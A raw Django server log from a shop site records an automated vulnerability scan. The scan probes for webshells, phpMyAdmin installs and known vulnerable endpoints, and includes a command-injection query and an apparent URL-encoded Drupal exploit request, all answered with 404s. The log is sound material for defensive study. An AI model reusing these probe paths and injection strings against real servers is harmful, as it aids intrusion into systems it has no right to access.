2019-12-22 04:09:13,028 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [22/Dec/2019 04:09:13] "GET /joomla/ HTTP/1.0" 404 1728 DEBUG 2019-12-22 04:09:13,595 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla'; args=('Joomla',) Not Found: /Joomla/ [22/Dec/2019 04:09:13] "GET /Joomla/ HTTP/1.0" 404 1728 [22/Dec/2019 04:09:14] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.0" 302 0 Not Found: /d7.php [22/Dec/2019 04:09:14] "GET /d7.php HTTP/1.0" 404 6438 Not Found: /rxr.php [22/Dec/2019 04:09:14] "GET /rxr.php HTTP/1.0" 404 6441 Not Found: /1x.php [22/Dec/2019 04:09:15] "GET /1x.php HTTP/1.0" 404 6438 Not Found: /spider.php [22/Dec/2019 04:09:24] "GET /spider.php HTTP/1.0" 404 6450 Not Found: /payload.php [22/Dec/2019 04:09:24] "GET /payload.php HTTP/1.0" 404 6453 Not Found: /composers.php [22/Dec/2019 04:09:28] "GET /composers.php HTTP/1.0" 404 6459 Not Found: /izom.php [22/Dec/2019 04:09:28] "GET /izom.php HTTP/1.0" 404 6444 Not Found: /composer.php [22/Dec/2019 04:09:32] "GET /composer.php HTTP/1.0" 404 6456 Not Found: /hue2.php [22/Dec/2019 04:09:32] "GET /hue2.php HTTP/1.0" 404 6444 Not Found: /Drupal.php [22/Dec/2019 04:09:33] "GET /Drupal.php HTTP/1.0" 404 6450 Not Found: /lang.php [22/Dec/2019 04:09:33] "GET /lang.php?f=1 HTTP/1.0" 404 6448 Not Found: /izom.php [22/Dec/2019 04:09:36] "GET /izom.php HTTP/1.0" 404 6444 Not Found: /payload.php [22/Dec/2019 04:09:36] "GET /payload.php HTTP/1.0" 404 6453 Not Found: /new_license.php [22/Dec/2019 04:09:37] "GET /new_license.php HTTP/1.0" 404 6465 Not Found: /images/vuln.php [22/Dec/2019 04:09:40] "GET /images/vuln.php HTTP/1.0" 404 6465 Not Found: /hd.php [22/Dec/2019 04:09:40] "GET /hd.php HTTP/1.0" 404 6438 Not Found: /images/up.php [22/Dec/2019 04:09:41] "GET /images/up.php HTTP/1.0" 404 6459 Not Found: /images/attari.php [22/Dec/2019 04:09:41] "GET /images/attari.php HTTP/1.0" 404 6471 Not Found: /images/jsspwneed.php [22/Dec/2019 04:09:42] "GET /images/jsspwneed.php HTTP/1.0" 404 6480 Not Found: /images/stories/cmd.php [22/Dec/2019 04:09:42] "GET /images/stories/cmd.php HTTP/1.0" 404 6486 Not Found: /images/stories/filemga.php [22/Dec/2019 04:09:44] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6509 Not Found: /up.php [22/Dec/2019 04:09:44] "GET /up.php HTTP/1.0" 404 6438 Not Found: /laravel.php [22/Dec/2019 04:09:45] "GET /laravel.php HTTP/1.0" 404 6453 Not Found: /huoshan.php [22/Dec/2019 04:09:46] "GET /huoshan.php HTTP/1.0" 404 6453 Not Found: /yu.php [22/Dec/2019 04:09:48] "GET /yu.php HTTP/1.0" 404 6438 Not Found: /floaw.php [22/Dec/2019 04:09:48] "GET /floaw.php HTTP/1.0" 404 6447 Not Found: /ftmabc.php [22/Dec/2019 04:09:50] "GET /ftmabc.php HTTP/1.0" 404 6450 Not Found: /mjx.php [22/Dec/2019 04:09:52] "GET /mjx.php HTTP/1.0" 404 6441 Not Found: /xiaoxia.php [22/Dec/2019 04:09:52] "GET /xiaoxia.php HTTP/1.0" 404 6453 Not Found: /yuyang.php [22/Dec/2019 04:09:53] "GET /yuyang.php HTTP/1.0" 404 6450 Not Found: /zz.php [22/Dec/2019 04:09:53] "GET /zz.php HTTP/1.0" 404 6438 Not Found: /coonig.php [22/Dec/2019 04:09:54] "GET /coonig.php HTTP/1.0" 404 6450 Not Found: /ak.php [22/Dec/2019 04:09:55] "GET /ak.php HTTP/1.0" 404 6438 Not Found: /baidoubi.php [22/Dec/2019 04:09:55] "GET /baidoubi.php HTTP/1.0" 404 6456 Not Found: /no1.php [22/Dec/2019 04:10:08] "GET /no1.php HTTP/1.0" 404 6441 Not Found: /python.php [22/Dec/2019 04:10:08] "GET /python.php HTTP/1.0" 404 6450 Not Found: /indea.php [22/Dec/2019 04:10:12] "GET /indea.php HTTP/1.0" 404 6447 Not Found: /taisui.php [22/Dec/2019 04:10:12] "GET /taisui.php HTTP/1.0" 404 6450 Not Found: /xiaxia.php [22/Dec/2019 04:10:16] "GET /xiaxia.php HTTP/1.0" 404 6450 Not Found: /kk.php [22/Dec/2019 04:10:16] "GET /kk.php HTTP/1.0" 404 6438 Not Found: /zzz.php [22/Dec/2019 04:10:20] "GET /zzz.php HTTP/1.0" 404 6441 Not Found: /99.php [22/Dec/2019 04:10:20] "GET /99.php HTTP/1.0" 404 6438 Not Found: /dp.php [22/Dec/2019 04:10:21] "GET /dp.php HTTP/1.0" 404 6438 Not Found: /hs.php [22/Dec/2019 04:10:24] "GET /hs.php HTTP/1.0" 404 6438 Not Found: /1ts.php [22/Dec/2019 04:10:24] "GET /1ts.php HTTP/1.0" 404 6441 Not Found: /haiyan.php [22/Dec/2019 04:10:25] "GET /haiyan.php HTTP/1.0" 404 6450 Not Found: /root.php [22/Dec/2019 04:10:28] "GET /root.php HTTP/1.0" 404 6444 Not Found: /5678.php [22/Dec/2019 04:10:28] "GET /5678.php HTTP/1.0" 404 6444 Not Found: /root11.php [22/Dec/2019 04:10:29] "GET /root11.php HTTP/1.0" 404 6450 Not Found: /xiu.php [22/Dec/2019 04:10:29] "GET /xiu.php HTTP/1.0" 404 6441 Not Found: /wuwu11.php [22/Dec/2019 04:10:30] "POST /wuwu11.php HTTP/1.0" 404 6451 Not Found: /xw1.php [22/Dec/2019 04:10:33] "POST /xw1.php HTTP/1.0" 404 6442 Not Found: /9678.php [22/Dec/2019 04:10:33] "POST /9678.php HTTP/1.0" 404 6445 Not Found: /wc.php [22/Dec/2019 04:10:34] "POST /wc.php HTTP/1.0" 404 6439 Not Found: /xx.php [22/Dec/2019 04:10:35] "POST /xx.php HTTP/1.0" 404 6439 Not Found: /s.php [22/Dec/2019 04:10:40] "POST /s.php HTTP/1.0" 404 6436 Not Found: /w.php [22/Dec/2019 04:10:40] "POST /w.php HTTP/1.0" 404 6436 Not Found: /sheep.php [22/Dec/2019 04:10:44] "POST /sheep.php HTTP/1.0" 404 6448 Not Found: /qaq.php [22/Dec/2019 04:10:44] "POST /qaq.php HTTP/1.0" 404 6442 Not Found: /my.php [22/Dec/2019 04:10:48] "POST /my.php HTTP/1.0" 404 6439 Not Found: /qq.php [22/Dec/2019 04:10:48] "POST /qq.php HTTP/1.0" 404 6439 Not Found: /aaa.php [22/Dec/2019 04:10:49] "POST /aaa.php HTTP/1.0" 404 6442 Not Found: /jjj.php [22/Dec/2019 04:10:52] "POST /jjj.php HTTP/1.0" 404 6442 Not Found: /vvv.php [22/Dec/2019 04:10:52] "POST /vvv.php HTTP/1.0" 404 6442 Not Found: /www.php [22/Dec/2019 04:10:53] "POST /www.php HTTP/1.0" 404 6442 Not Found: /ffr.php [22/Dec/2019 04:10:53] "POST /ffr.php HTTP/1.0" 404 6442 Not Found: /411.php [22/Dec/2019 04:10:54] "POST /411.php HTTP/1.0" 404 6442 Not Found: /415.php [22/Dec/2019 04:10:54] "POST /415.php HTTP/1.0" 404 6442 Not Found: /421.php [22/Dec/2019 04:10:56] "POST /421.php HTTP/1.0" 404 6442 Not Found: /444.php [22/Dec/2019 04:10:56] "POST /444.php HTTP/1.0" 404 6442 Not Found: /a411.php [22/Dec/2019 04:10:57] "POST /a411.php HTTP/1.0" 404 6445 Not Found: /whoami.php [22/Dec/2019 04:10:57] "POST /whoami.php HTTP/1.0" 404 6451 Not Found: /whoami.php.php [22/Dec/2019 04:10:58] "POST /whoami.php.php HTTP/1.0" 404 6463 Not Found: /9.php [22/Dec/2019 04:10:58] "POST /9.php HTTP/1.0" 404 6436 Not Found: /98k.php [22/Dec/2019 04:10:59] "POST /98k.php HTTP/1.0" 404 6442 Not Found: /981.php [22/Dec/2019 04:10:59] "POST /981.php HTTP/1.0" 404 6442 Not Found: /888.php [22/Dec/2019 04:11:08] "POST /888.php HTTP/1.0" 404 6442 Not Found: /bb.php [22/Dec/2019 04:11:12] "POST /bb.php HTTP/1.0" 404 6439 Not Found: /pp.php [22/Dec/2019 04:11:12] "POST /pp.php HTTP/1.0" 404 6439 Not Found: /tt.php [22/Dec/2019 04:11:12] "POST /tt.php HTTP/1.0" 404 6439 Not Found: /bbq.php [22/Dec/2019 04:11:13] "POST /bbq.php HTTP/1.0" 404 6442 Not Found: /jbb.php [22/Dec/2019 04:11:16] "POST /jbb.php HTTP/1.0" 404 6442 Not Found: /7o.php [22/Dec/2019 04:11:16] "POST /7o.php HTTP/1.0" 404 6439 Not Found: /qwq.php [22/Dec/2019 04:11:17] "POST /qwq.php HTTP/1.0" 404 6442 Not Found: /nb.php [22/Dec/2019 04:11:17] "POST /nb.php HTTP/1.0" 404 6439 Not Found: /kpl.php [22/Dec/2019 04:11:18] "POST /kpl.php HTTP/1.0" 404 6442 Not Found: /ppl.php [22/Dec/2019 04:11:20] "POST /ppl.php HTTP/1.0" 404 6442 Not Found: /tty.php [22/Dec/2019 04:11:20] "POST /tty.php HTTP/1.0" 404 6442 Not Found: /ooi.php [22/Dec/2019 04:11:21] "POST /ooi.php HTTP/1.0" 404 6442 Not Found: /aap.php [22/Dec/2019 04:11:22] "POST /aap.php HTTP/1.0" 404 6442 Not Found: /app.php [22/Dec/2019 04:11:22] "POST /app.php HTTP/1.0" 404 6442 Not Found: /bbr.php [22/Dec/2019 04:11:23] "POST /bbr.php HTTP/1.0" 404 6442 Not Found: /ioi.php [22/Dec/2019 04:11:23] "POST /ioi.php HTTP/1.0" 404 6442 Not Found: /yyy.php [22/Dec/2019 04:11:32] "POST /yyy.php HTTP/1.0" 404 6442 Not Found: /ack.php [22/Dec/2019 04:11:32] "POST /ack.php HTTP/1.0" 404 6442 Not Found: /shh.php [22/Dec/2019 04:11:36] "POST /shh.php HTTP/1.0" 404 6442 Not Found: /ddd.php [22/Dec/2019 04:11:36] "POST /ddd.php HTTP/1.0" 404 6442 Not Found: /nnn.php [22/Dec/2019 04:11:40] "POST /nnn.php HTTP/1.0" 404 6442 Not Found: /rrr.php [22/Dec/2019 04:11:40] "POST /rrr.php HTTP/1.0" 404 6442 Not Found: /ttt.php [22/Dec/2019 04:11:44] "POST /ttt.php HTTP/1.0" 404 6442 Not Found: /bbqq.php [22/Dec/2019 04:11:44] "POST /bbqq.php HTTP/1.0" 404 6445 Not Found: /tyrant.php [22/Dec/2019 04:11:45] "POST /tyrant.php HTTP/1.0" 404 6451 Not Found: /qiqi.php [22/Dec/2019 04:11:45] "POST /qiqi.php HTTP/1.0" 404 6445 Not Found: /qiqi1.php [22/Dec/2019 04:11:48] "POST /qiqi1.php HTTP/1.0" 404 6448 Not Found: /zhk.php [22/Dec/2019 04:11:48] "POST /zhk.php HTTP/1.0" 404 6442 Not Found: /bbv.php [22/Dec/2019 04:11:49] "POST /bbv.php HTTP/1.0" 404 6442 Not Found: /605.php [22/Dec/2019 04:11:49] "POST /605.php HTTP/1.0" 404 6442 Not Found: /admin1.php [22/Dec/2019 04:11:52] "POST /admin1.php HTTP/1.0" 404 6451 Not Found: /xi.php [22/Dec/2019 04:11:52] "POST /xi.php HTTP/1.0" 404 6439 Not Found: /999.php [22/Dec/2019 04:11:53] "POST /999.php HTTP/1.0" 404 6442 Not Found: /jsc.php.php [22/Dec/2019 04:11:56] "POST /jsc.php.php HTTP/1.0" 404 6454 Not Found: /jsc.php [22/Dec/2019 04:11:58] "POST /jsc.php HTTP/1.0" 404 6442 Not Found: /11a.php [22/Dec/2019 04:11:58] "POST /11a.php HTTP/1.0" 404 6442 Not Found: /kkl.php [22/Dec/2019 04:11:59] "POST /kkl.php HTTP/1.0" 404 6442 Not Found: /seeyon/htmlofficeservlet [22/Dec/2019 04:12:08] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6492 Not Found: /secure/ContactAdministrators!default.jspa [22/Dec/2019 04:12:08] "GET /secure/ContactAdministrators!default.jspa HTTP/1.0" 404 6543 Not Found: /weaver/bsh.servlet.BshServlet [22/Dec/2019 04:12:12] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6507 DEBUG 2019-12-22 04:12:12,682 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'solr'; args=('solr',) Not Found: /solr/ [22/Dec/2019 04:12:12] "GET /solr/ HTTP/1.0" 404 1724 Not Found: /index.php [22/Dec/2019 04:12:13] "POST /index.php HTTP/1.0" 404 6448 Not Found: /user/register [22/Dec/2019 04:12:24] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6697 [22/Dec/2019 04:12:25] "GET / HTTP/1.0" 302 0 Not Found: /user.php [22/Dec/2019 04:12:25] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6445 Not Found: /index.php [22/Dec/2019 04:12:27] "GET /index.php HTTP/1.0" 404 6447 Not Found: /phpmyadmin/index.php [22/Dec/2019 04:12:28] "GET /phpmyadmin/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdmin/index.php [22/Dec/2019 04:12:28] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6480 Not Found: /pmd/index.php [22/Dec/2019 04:12:30] "GET /pmd/index.php HTTP/1.0" 404 6459 Not Found: /pma/index.php [22/Dec/2019 04:12:30] "GET /pma/index.php HTTP/1.0" 404 6459 Not Found: /PMA/index.php [22/Dec/2019 04:12:31] "GET /PMA/index.php HTTP/1.0" 404 6459 Not Found: /PMA2/index.php [22/Dec/2019 04:12:36] "GET /PMA2/index.php HTTP/1.0" 404 6462 Not Found: /pmamy/index.php [22/Dec/2019 04:12:36] "GET /pmamy/index.php HTTP/1.0" 404 6465 Not Found: /pmamy2/index.php [22/Dec/2019 04:12:40] "GET /pmamy2/index.php HTTP/1.0" 404 6468 Not Found: /mysql/index.php [22/Dec/2019 04:12:40] "GET /mysql/index.php HTTP/1.0" 404 6465 Not Found: /admin/index.php [22/Dec/2019 04:12:44] "GET /admin/index.php HTTP/1.0" 404 8892 Not Found: /db/index.php [22/Dec/2019 04:12:44] "GET /db/index.php HTTP/1.0" 404 6456 Not Found: /dbadmin/index.php [22/Dec/2019 04:12:48] "GET /dbadmin/index.php HTTP/1.0" 404 6471 Not Found: /web/phpMyAdmin/index.php [22/Dec/2019 04:12:48] "GET /web/phpMyAdmin/index.php HTTP/1.0" 404 6492 Not Found: /admin/pma/index.php [22/Dec/2019 04:12:49] "GET /admin/pma/index.php HTTP/1.0" 404 8904 Not Found: /admin/PMA/index.php [22/Dec/2019 04:12:49] "GET /admin/PMA/index.php HTTP/1.0" 404 8904 Not Found: /admin/mysql/index.php [22/Dec/2019 04:12:52] "GET /admin/mysql/index.php HTTP/1.0" 404 8910 Not Found: /admin/mysql2/index.php [22/Dec/2019 04:12:52] "GET /admin/mysql2/index.php HTTP/1.0" 404 8913 Not Found: /admin/phpmyadmin/index.php [22/Dec/2019 04:12:53] "GET /admin/phpmyadmin/index.php HTTP/1.0" 404 8925 Not Found: /admin/phpMyAdmin/index.php [22/Dec/2019 04:12:54] "GET /admin/phpMyAdmin/index.php HTTP/1.0" 404 8925 Not Found: /admin/phpmyadmin2/index.php [22/Dec/2019 04:12:56] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 8928 Not Found: /mysqladmin/index.php [22/Dec/2019 04:12:56] "GET /mysqladmin/index.php HTTP/1.0" 404 6480 Not Found: /mysql-admin/index.php [22/Dec/2019 04:12:57] "GET /mysql-admin/index.php HTTP/1.0" 404 6483 Not Found: /mysql_admin/index.php [22/Dec/2019 04:12:57] "GET /mysql_admin/index.php HTTP/1.0" 404 6483 Not Found: /phpadmin/index.php [22/Dec/2019 04:12:58] "GET /phpadmin/index.php HTTP/1.0" 404 6474 Not Found: /phpmyadmin0/index.php [22/Dec/2019 04:13:00] "GET /phpmyadmin0/index.php HTTP/1.0" 404 6483 Not Found: /phpmyadmin1/index.php [22/Dec/2019 04:13:00] "GET /phpmyadmin1/index.php HTTP/1.0" 404 6483 Not Found: /phpmyadmin2/index.php [22/Dec/2019 04:13:01] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdmin-4.4.0/index.php [22/Dec/2019 04:13:02] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6498 Not Found: /phpMyAdmin4.8.1/index.php [22/Dec/2019 04:13:04] "GET /phpMyAdmin4.8.1/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.2/index.php [22/Dec/2019 04:13:04] "GET /phpMyAdmin4.8.2/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.3/index.php [22/Dec/2019 04:13:06] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.4/index.php [22/Dec/2019 04:13:06] "GET /phpMyAdmin4.8.4/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.5/index.php [22/Dec/2019 04:13:07] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6495 Not Found: /myadmin/index.php [22/Dec/2019 04:13:07] "GET /myadmin/index.php HTTP/1.0" 404 6471 Not Found: /phpMyadmin_bak/index.php [22/Dec/2019 04:13:20] "GET /phpMyadmin_bak/index.php HTTP/1.0" 404 6492 Not Found: /www/phpMyAdmin/index.php [22/Dec/2019 04:13:20] "GET /www/phpMyAdmin/index.php HTTP/1.0" 404 6492 Not Found: /tools/phpMyAdmin/index.php [22/Dec/2019 04:13:24] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6498 Not Found: /phpmyadmin-old/index.php [22/Dec/2019 04:13:24] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6492 Not Found: /phpMyAdminold/index.php [22/Dec/2019 04:13:28] "GET /phpMyAdminold/index.php HTTP/1.0" 404 6489 Not Found: /phpMyAdmin.old/index.php [22/Dec/2019 04:13:29] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6492 Not Found: /pma-old/index.php [22/Dec/2019 04:13:29] "GET /pma-old/index.php HTTP/1.0" 404 6471 Not Found: /typo3/phpmyadmin/index.php [22/Dec/2019 04:13:33] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6498 Not Found: /phpma/index.php [22/Dec/2019 04:13:34] "GET /phpma/index.php HTTP/1.0" 404 6465 Not Found: /phpmyadmin/phpmyadmin/index.php [22/Dec/2019 04:13:34] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.0" 404 6513 Not Found: /phpMyAdmin/phpMyAdmin/index.php [22/Dec/2019 04:13:36] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.0" 404 6513 Not Found: /phpMyAbmin/index.php [22/Dec/2019 04:13:36] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdmin__/index.php [22/Dec/2019 04:13:37] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6486 Not Found: /phpMyAdmin+++---/index.php [22/Dec/2019 04:13:37] "GET /phpMyAdmin+++---/index.php HTTP/1.0" 404 6498 Not Found: /v/index.php [22/Dec/2019 04:13:38] "GET /v/index.php HTTP/1.0" 404 6453 Not Found: /phpmyadm1n/index.php [22/Dec/2019 04:13:38] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdm1n/index.php [22/Dec/2019 04:13:39] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6480 Not Found: /shaAdmin/index.php [22/Dec/2019 04:13:39] "GET /shaAdmin/index.php HTTP/1.0" 404 6474 Not Found: /phpMyAdmion/index.php [22/Dec/2019 04:13:48] "GET /phpMyAdmion/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdmin1/index.php [22/Dec/2019 04:13:56] "GET /phpMyAdmin1/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdmin123/index.php [22/Dec/2019 04:13:56] "GET /phpMyAdmin123/index.php HTTP/1.0" 404 6489 Not Found: /pwd/index.php [22/Dec/2019 04:13:57] "GET /pwd/index.php HTTP/1.0" 404 6459 Not Found: /phpMyAdmina/index.php [22/Dec/2019 04:14:00] "GET /phpMyAdmina/index.php HTTP/1.0" 404 6483 Not Found: /phpMydmin/index.php [22/Dec/2019 04:14:00] "GET /phpMydmin/index.php HTTP/1.0" 404 6477 Not Found: /phpMyAdmins/index.php [22/Dec/2019 04:14:01] "GET /phpMyAdmins/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdmin._2/index.php [22/Dec/2019 04:14:04] "GET /phpMyAdmin._2/index.php HTTP/1.0" 404 6489 Not Found: /phpmyadmin2222/index.php [22/Dec/2019 04:14:04] "GET /phpmyadmin2222/index.php HTTP/1.0" 404 6492 Not Found: /phpMyAdmin333/index.php [22/Dec/2019 04:14:05] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6489 Not Found: /phpmyadmin3333/index.php [22/Dec/2019 04:14:05] "GET /phpmyadmin3333/index.php HTTP/1.0" 404 6492 Not Found: /php2MyAdmin/index.php [22/Dec/2019 04:14:06] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6483 Not Found: /phpNyAdmin/index.php [22/Dec/2019 04:14:08] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6480 Not Found: /1/index.php [22/Dec/2019 04:14:09] "GET /1/index.php HTTP/1.0" 404 6453 Not Found: /download/index.php [22/Dec/2019 04:14:09] "GET /download/index.php HTTP/1.0" 404 6474 Not Found: /phpMyAdmin_111/index.php [22/Dec/2019 04:14:10] "GET /phpMyAdmin_111/index.php HTTP/1.0" 404 6492 Not Found: /phpmadmin/index.php [22/Dec/2019 04:14:10] "GET /phpmadmin/index.php HTTP/1.0" 404 6477 Not Found: /321/index.php [22/Dec/2019 04:14:12] "GET /321/index.php HTTP/1.0" 404 6459 Not Found: /123131/index.php [22/Dec/2019 04:14:12] "GET /123131/index.php HTTP/1.0" 404 6468 Not Found: /phpMyAdminn/index.php [22/Dec/2019 04:14:13] "GET /phpMyAdminn/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdminhf/index.php [22/Dec/2019 04:14:13] "GET /phpMyAdminhf/index.php HTTP/1.0" 404 6486 Not Found: /sbb/index.php [22/Dec/2019 04:14:14] "GET /sbb/index.php HTTP/1.0" 404 6459 Not Found: /WWW/phpMyAdmin/index.php [22/Dec/2019 04:14:14] "GET /WWW/phpMyAdmin/index.php HTTP/1.0" 404 6492 Not Found: /phpMyAdmln/index.php [22/Dec/2019 04:14:15] "GET /phpMyAdmln/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdmin_ai/index.php [22/Dec/2019 04:14:15] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6489 [22/Dec/2019 04:14:18] "GET / HTTP/1.0" 302 0 Not Found: /program/index.php [22/Dec/2019 04:14:24] "GET /program/index.php HTTP/1.0" 404 6471 Not Found: /shopdb/index.php [22/Dec/2019 04:14:28] "GET /shopdb/index.php HTTP/1.0" 404 6468 Not Found: /phppma/index.php [22/Dec/2019 04:14:28] "GET /phppma/index.php HTTP/1.0" 404 6468 Not Found: /phpmy/index.php [22/Dec/2019 04:14:32] "GET /phpmy/index.php HTTP/1.0" 404 6465 Not Found: /mysql/admin/index.php [22/Dec/2019 04:14:32] "GET /mysql/admin/index.php HTTP/1.0" 404 6483 Not Found: /mysql/sqlmanager/index.php [22/Dec/2019 04:14:36] "GET /mysql/sqlmanager/index.php HTTP/1.0" 404 6498 Not Found: /mysql/mysqlmanager/index.php [22/Dec/2019 04:14:36] "GET /mysql/mysqlmanager/index.php HTTP/1.0" 404 6504 Not Found: /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php [22/Dec/2019 04:14:37] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.0" 404 6597 Not Found: /sql/index.php [22/Dec/2019 04:14:40] "GET /sql/index.php HTTP/1.0" 404 6459 Not Found: /SQL/index.php [22/Dec/2019 04:14:40] "GET /SQL/index.php HTTP/1.0" 404 6459 Not Found: /websql/index.php [22/Dec/2019 04:14:41] "GET /websql/index.php HTTP/1.0" 404 6468 Not Found: /MySQLAdmin/index.php [22/Dec/2019 04:14:41] "GET /MySQLAdmin/index.php HTTP/1.0" 404 6480 Not Found: /manager/html [22/Dec/2019 04:14:42] "GET /manager/html HTTP/1.0" 404 6456 [22/Dec/2019 04:19:52] "GET / HTTP/1.0" 302 0 [22/Dec/2019 04:24:55] "GET / HTTP/1.0" 302 0 [22/Dec/2019 04:30:13] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [22/Dec/2019 04:31:45] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [22/Dec/2019 04:31:53] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=189 HTTP/1.0" 404 6532 Not Found: /newslist.asp [22/Dec/2019 04:32:06] "GET /newslist.asp?type=4&id=1336 HTTP/1.0" 404 6476 [22/Dec/2019 04:35:15] "GET / HTTP/1.0" 302 0 [22/Dec/2019 04:40:18] "GET / HTTP/1.0" 302 0 [22/Dec/2019 04:46:39] "GET / HTTP/1.0" 302 0 [22/Dec/2019 04:51:42] "GET / HTTP/1.0" 302 0 [22/Dec/2019 04:58:52] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:10:06] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:15:13] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:20:16] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:25:19] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:30:21] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:35:24] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:41:51] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:46:54] "GET / HTTP/1.0" 302 0 [22/Dec/2019 05:53:38] "GET / HTTP/1.0" 302 0 [22/Dec/2019 06:00:01] "GET / HTTP/1.0" 302 0 [22/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [22/Dec/2019 06:07:23] "HEAD /robots.txt HTTP/1.0" 404 6454 Not Found: /proxy.php [22/Dec/2019 06:07:59] "GET /proxy.php HTTP/1.0" 404 6454 [22/Dec/2019 06:13:34] "GET / HTTP/1.0" 302 0 [22/Dec/2019 06:18:37] "GET / HTTP/1.0" 302 0 [22/Dec/2019 06:28:14] "GET / HTTP/1.0" 302 0 [22/Dec/2019 06:33:17] "GET / HTTP/1.0" 302 0 [22/Dec/2019 06:38:35] "GET / HTTP/1.0" 302 0 [22/Dec/2019 06:43:57] "GET / HTTP/1.0" 302 0 [22/Dec/2019 06:53:05] "GET / HTTP/1.0" 302 0 [22/Dec/2019 06:58:08] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:11:33] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:16:35] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:21:38] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:27:07] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:32:11] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:37:14] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:44:56] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:52:46] "GET / HTTP/1.0" 302 0 [22/Dec/2019 07:57:48] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:10:05] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:15:15] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [22/Dec/2019 08:20:18] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:25:20] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:30:30] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:35:56] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:40:59] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:46:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 08:51:04] "GET / HTTP/1.0" 302 0 Internal Server Error: 